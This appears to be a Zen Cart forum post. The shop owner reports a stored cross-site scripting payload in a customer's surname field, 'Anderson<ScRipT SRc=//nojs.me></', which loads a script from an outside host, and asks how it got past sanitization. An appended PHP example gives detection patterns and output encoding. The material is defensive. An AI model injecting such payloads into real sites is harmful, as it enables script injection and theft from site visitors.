I have a site running Zen Cart 1.5.7c with lat9's excellent One Page Checkout module.
A recent account created showed the following surname entry.
Code:
Anderson<ScRipT SRc=//nojs.me></
I checked the form fields and they are written like
Code:
$firstname = zen_db_prepare_input(zen_sanitize_string($_POST['firstname']));
$lastname = zen_db_prepare_input(zen_sanitize_string($_POST['lastname']));
How did this get past Zen Cart's data sanitization?
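A defensive check for the kind of value shown in the post, as an added example that is not part of the original post or of Zen Cart's own code: it flags name fields that contain markup and HTML-encodes the value at display time. The function names `audit_name_field` and `render_name` are hypothetical, and the sample values are constructed (the second is the surname quoted above).

```php
<?php
declare(strict_types=1);

/**
 * Added example (hypothetical helper, not Zen Cart code).
 * Returns the reasons a submitted name looks like markup rather than a name.
 */
function audit_name_field(string $value): array
{
    $reasons = [];
    // Angle brackets never belong in a personal name.
    if (strpbrk($value, '<>') !== false) {
        $reasons[] = 'angle bracket';
    }
    // Tag names are case-insensitive in HTML, so match ScRipT as well as script.
    if (preg_match('/<\s*\/?\s*(script|img|svg|iframe|object|embed)\b/i', $value)) {
        $reasons[] = 'html tag';
    }
    // Attribute values do not need quotes, and //host is a protocol-relative URL.
    if (preg_match('/\b(src|href)\s*=\s*["\']?\s*(https?:)?\/\//i', $value)) {
        $reasons[] = 'external resource reference';
    }
    // Control characters have no place in a name field.
    if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
        $reasons[] = 'control character';
    }
    return $reasons;
}

/** Encode at output time so a stored value is rendered as text, never as markup. */
function render_name(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample values; the second is the surname quoted in the post.
$samples = ["O'Connor-Smith", 'Anderson<ScRipT SRc=//nojs.me></', "Jos\u{00E9} Mu\u{00F1}oz"];

foreach ($samples as $name) {
    $reasons = audit_name_field($name);
    $verdict = $reasons ? 'FLAG: ' . implode(', ', $reasons) : 'ok';
    printf("%-50s %s\n", render_name($name), $verdict);
}
```

The same audit function can be run over names already stored in the database to find other accounts created with similar entries.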